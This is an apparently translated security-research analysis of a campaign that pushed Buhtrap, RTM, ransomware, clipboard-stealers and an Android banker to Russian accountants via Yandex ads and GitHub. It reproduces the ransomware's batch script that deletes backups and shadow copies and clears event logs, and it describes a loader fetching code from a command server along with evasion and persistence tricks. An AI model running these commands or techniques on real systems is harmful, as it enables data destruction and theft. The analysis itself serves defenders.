To target a cyberattack on accountants, you can use work papers that they search for on the web. Something like this in the last few months, a cyber group has been operating, distributing known backdoors. ΠΈ , as well as encryptors and software for stealing cryptocurrencies. Most targets are located in Russia. The attack was implemented by placing malicious ads in Yandex.Direct. Potential victims were redirected to a site where they were offered to download a malicious file disguised as a document template. Yandex removed the malicious ad after our warning.
Buhtrap's source code has been leaked in the past so anyone can use it. We have no information regarding the availability of the RTM code.
In this post, we will describe how the attackers distributed malware using Yandex.Direct and hosted it on GitHub. The post will be completed by a technical analysis of the malware.
Buhtrap and RTM back in business
Distribution mechanism and victims
The different payloads delivered to victims share a common propagation mechanism. All malicious files created by the attackers were hosted in two different GitHub repositories.
Typically, the repository contained one downloadable malicious file that changed frequently. Since we can look at the change history of a repository on GitHub, we can see which malware was distributed in a certain period. The blanki-shabloni24[.]ru site shown in the figure above was used to convince the victim to download the malicious file.
The design of the site and all the names of the malicious files are based on a single concept β forms, templates, contracts, samples, etc. Considering that Buhtrap and RTM software have already been used in attacks on accountants in the past, we assumed that the strategy is the same in the new campaign. The only question is how the victim got to the site of the attackers.
Infection
At least a few potential victims who ended up on this site were attracted by malicious ads. Below is an example URL:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=ΡΠΊΠ°ΡΠ°ΡΡ Π±Π»Π°Π½ΠΊ ΡΡΠ΅ΡΠ°&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
As you can see from the link, the banner was posted on the legitimate accounting forum bb.f2[.]kz. It is important to note that the banners appeared on different sites, all had the same campaign id (blanki_rsya), and most related to accounting or legal services. It can be seen from the URL that the potential victim used the request "download invoice form", which supports our hypothesis about targeted attacks. Listed below are the sites where the banners appeared and the corresponding search queries.
- download invoice form - bb.f2[.]kz
- sample contract - Ipopen[.]ru
- statement complaint sample - 77metrov[.]ru
- contract form - blank-dogovor-kupli-sales[.]ru
- sample petition β zen.yandex[.]ru
- sample complaint - yurday[.]ru
- samples of contract forms - Regforum[.]ru
- contract form - assistentus[.]ru
- apartment contract sample β napravah[.]com
- samples of legal contracts β avito[.]ru
The blanki-shabloni24[.]ru site may have been set up to pass a simple visual evaluation. As a general rule, ads that point to a professional-looking site with a link to GitHub don't look like something obviously bad. In addition, the attackers uploaded malicious files to the repository only for a limited period, probably for the duration of the campaign. Most of the GitHub repository contained an empty zip archive or a clean exe file. Thus, the attackers could distribute advertising through Yandex.Direct on sites that were most likely visited by accountants who came for specific search queries.
Next, consider the various payloads propagated in this way.
Payload Analysis
Chronology of distribution
The malicious campaign began at the end of October 2018 and is active at the time of writing. Because the entire repository was publicly available on GitHub, we compiled an accurate distribution timeline for six different families of malware (see the figure below). We have added a line showing when the link to the banner was detected, according to ESET telemetry, for comparison with the git history. As you can see, this correlates well with the availability of the payload on GitHub. The discrepancy at the end of February can be explained by the fact that we did not have part of the change history, since the repository was removed from GitHub before we could get it in full.
Figure 1. Chronology of malware distribution.
Code signing certificates
The campaign used a variety of certificates. Some of them were signed by more than one malware family, which additionally indicates that different samples belong to the same campaign. Despite the availability of the private key, the operators did not systematically sign the binaries and did not use the key for all samples. At the end of February 2019, attackers started creating invalid signatures using a certificate owned by Google for which they do not have the private key.
All the certificates involved in the campaign and the families of malware they sign are listed in the table below.
We have also used these code signing certificates to communicate with other malware families. For most certificates, we did not find samples that were not distributed through a GitHub repository. However, the TOV βMARIYAβ certificate was used to sign malware belonging to the botnet , adware and miners. It is unlikely that this malware is associated with this campaign. Most likely, the certificate was purchased on the dark web.
Win32/Filecoder.Buhtrap
The first component that caught our attention is the first discovered Win32/Filecoder.Buhtrap. This is a Delphi binary that is sometimes packaged. It was mainly distributed in February-March 2019. It behaves like a ransomware program - it searches local drives and network folders and encrypts the files it finds. It doesn't need an internet connection to compromise because it doesn't contact the server to send encryption keys. Instead, he adds a "token" at the end of the ransom message, and suggests using email or Bitmessage to contact operators.
In order to encrypt as many important resources as possible, Filecoder.Buhtrap runs a thread designed to shut down key software that may have open file handlers with valuable information that can interfere with encryption. Target processes are mainly database management systems (DBMS). In addition, Filecoder.Buhtrap removes log files and backups to make data recovery more difficult. To do this, the batch script below is executed.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap uses a legitimate online IP Logger service designed to collect information about website visitors. This is intended to track ransomware victims, which is what the command line is responsible for:
mshta.exe "javascript:document.write('');"
Files for encryption are selected in case of a mismatch in three lists of exclusions. First, files with the following extensions are not encrypted: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys, and .bat Second, all files for which the full path contains directory strings from the list below are excluded.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Third, certain filenames are also excluded from encryption, among them the filename of the ransom note. The list is presented below. Obviously, all these exceptions are intended to keep the machine running, but with its minimum serviceability.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
File Encryption Scheme
Once launched, the malware generates a pair of 512-bit RSA keys. The private exponent (d) and modulus (n) are then encrypted with a hardcoded 2048-bit public key (public exponent and modulus), packaged with zlib, and base64 encoded. The code responsible for this is shown in Figure 2.
Figure 2. The result of Hex-Rays decompiling the process of generating a 512-bit RSA key pair.
Below is a plain text example with a generated private key that is the token attached to the ransom message.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
The public key of the attackers is shown below.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
The files are encrypted using AES-128-CBC with a 256-bit key. For each encrypted file, a new key and a new initialization vector are generated. The key information is added to the end of the encrypted file. Consider the format of an encrypted file.
Encrypted files have the following header:
Source file data with the addition of the VEGA magic value is encrypted up to the first 0x5000 bytes. All information for decryption is attached to a file with the following structure:
- The file size marker contains a label indicating whether the file is larger than 0x5000 bytes
- AES key blob = ZlibCompress(RSAEncrypt(AES key + IV, public key of the generated RSA key pair))
- RSA key blob = ZlibCompress(RSAEncrypt(generated RSA private key, hardcoded RSA public key))
Win32/ClipBanker
Win32/ClipBanker is a component that was distributed intermittently from late October to early December 2018. Its role is to keep track of the contents of the clipboard, it looks for addresses of cryptocurrency wallets. Having determined the address of the target wallet, ClipBanker replaces it with an address presumably belonging to the operators. The samples we studied were neither packaged nor obfuscated. The only mechanism used to mask behavior is string encryption. Operator wallet addresses are encrypted using RC4. Target cryptocurrencies are Bitcoin, Bitcoin cash, Dogecoin, Ethereum and Ripple.
During the spread of the malware, a small amount was sent to the Bitcoin wallets of the attackers in BTC, which casts doubt on the success of the campaign. In addition, there is no reason to believe that these transactions were related to ClipBanker at all.
Win32/RTM
The Win32/RTM component was distributed over several days in early March 2019. RTM is a banking Trojan written in Delphi that targets remote banking systems. In 2017, ESET researchers published of this program, the description is still relevant. In January 2019, Palo Alto Networks also released .
Buhtrap Loader
For a while, a loader was available on GitHub that looked nothing like Buhtrap's previous tools. He refers to https://94.100.18[.]67/RSS.php?<some_id> to get the next step and loads it directly into memory. There are two behaviors of the second stage code. In the first URL, RSS.php passed the Buhtrap backdoor directly - this backdoor is very similar to the one available after the source code was leaked.
Interestingly, we see several campaigns with the Buhtrap backdoor, and presumably they are run by different operators. In this case, the main difference is that the backdoor is loaded directly into memory and does not use the usual scheme with the DLL deployment process that we talked about. . In addition, operators have changed the RC4 key used to encrypt network traffic to the C&C server. In most of the campaigns we've seen, the operators didn't care about changing this key.
The second, more complex behavior is that the URL RSS.php was passed by another loader. Some obfuscation was implemented in it, such as rebuilding the dynamic import table. The purpose of the loader is to contact the C&C server [.]com/api/F27F84EDA4D13B15/2, send logs and wait for a response. It treats the response as a blob, loads it into memory, and executes. The payload we saw when executing this loader was the same Buhtrap backdoor, but there may be other components.
Android/Spy.Banker
Interestingly, a component for Android was also found in the GitHub repository. He was in the main branch for only one day - November 1, 2018. Apart from being hosted on GitHub, ESET telemetry finds no evidence of this malware spreading.
The component was hosted as an Android Application Package (APK). He is heavily obfuscated. The malicious behavior is hidden in an encrypted JAR located in the APK. It is RC4 encrypted with this key:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
The same key and algorithm are used to encrypt strings. JAR is located in APK_ROOT + image/files. The first 4 bytes of the file contain the length of the encrypted JAR, which starts immediately after the length field.
After decrypting the file, we found that it was Anubis - previously banker for android. The malware has the following features:
- microphone recording
- screenshots
- getting GPS coordinates
- adware
- device data encryption and ransom demand
- spamming
Interestingly, the banker used Twitter as a backup communication channel to get another C&C server. The sample we analyzed used the @JohnesTrader account, but at the time of analysis it was already blocked.
Bunker contains a list of target applications on an Android device. It has become longer than the list obtained during the Sophos study. The list includes many banking applications, online shopping programs such as Amazon and eBay, and cryptocurrency services.
MSIL/ClipBanker.IH
The last component that was distributed as part of this campaign is the .NET Windows executable, which appeared in March 2019. Most of the versions studied were packaged with ConfuserEx v1.0.0. Like ClipBanker, this component uses the clipboard. His goal is a wide range of cryptocurrencies, as well as offers on Steam. In addition, he uses the IP Logger service to steal the private WIF key of Bitcoin.
Protection Mechanisms
In addition to the advantages that ConfuserEx provides in the form of counteracting debugging, dumping, and interference with work, the component has the ability to detect anti-virus products and virtual machines.
To verify that it runs in a virtual machine, the malware uses Windows' built-in WMI command line (WMIC) to query for BIOS information, namely:
wmic bios
The program then parses the output of the command and looks for the keywords: VBOX, VirtualBox, XEN, qemu, bochs, VM.
To detect antivirus products, malware sends a Windows Management Instrumentation (WMI) query to the Windows Security Center using ManagementObjectSearcher API as shown below. After decoding from base64, the call looks like this:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Figure 3. The process of defining antivirus products.
In addition, the malware checks to see if the , a tool to protect against attacks on the clipboard, and if it is running, suspends all threads of this process, thereby turning off protection.
Persistence
The version of malware we studied copies itself into %APPDATA%googleupdater.exe and sets the "hidden" attribute for the google directory. She then changes the value SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell in the Windows registry and add the path updater.exe. This way, the malware will be executed every time the user logs in.
Malicious behavior
Like ClipBanker, the malware monitors the contents of the clipboard and looks for addresses of cryptocurrency wallets, and when it finds it, it replaces it with one of the operator's addresses. Below is a list of target addresses based on what was found in the code.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
For each type of address there is a corresponding regular expression. The STEAM_URL value is used to attack the Steam system, as seen in the regular expression that is used to define in the buffer:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Exfiltration channel
In addition to replacing addresses in the buffer, the malware targets the private WIF keys of Bitcoin, Bitcoin Core, and Electrum Bitcoin wallets. The program uses plogger.org as an exfiltration channel to obtain the WIF private key. To do this, operators add private key data to the User-Agent HTTP header, as shown below.
Figure 4. IP Logger console with output.
Operators did not use iplogger.org to exfiltrate wallets. They probably resorted to a different method due to the 255 character limit in the field User-Agentdisplayed in the IP Logger web interface. In the samples we studied, another output server was stored in the environment variable DiscordWebHook. Surprisingly, this environment variable is not assigned anywhere in the code. This suggests that the malicious program is still under development, and the variable is assigned on the operator's test machine.
There is another sign that the program is in development. The binary includes two iplogger.org URLs, both of which are requested when data is exfiltrated. In a request to one of these URLs, the value in the Referer field is preceded by βDEV /β. We also found a version that was not packaged with ConfuserEx, the recipient for this URL is named DevFeedbackUrl. Based on the environment variable name, we believe that the operators are planning to use the legitimate Discord service and its web hijacking system to steal cryptocurrency wallets.
Conclusion
This campaign is an example of the use of legitimate advertising services in cyberattacks. The scheme targets Russian organizations, but we wouldn't be surprised to see such an attack using non-Russian services. To avoid compromise, users must be sure of the reputation of the source of the downloaded software.
A complete list of MITER ATT&CK indicators of compromise and attributes is available at .
Source: habr.com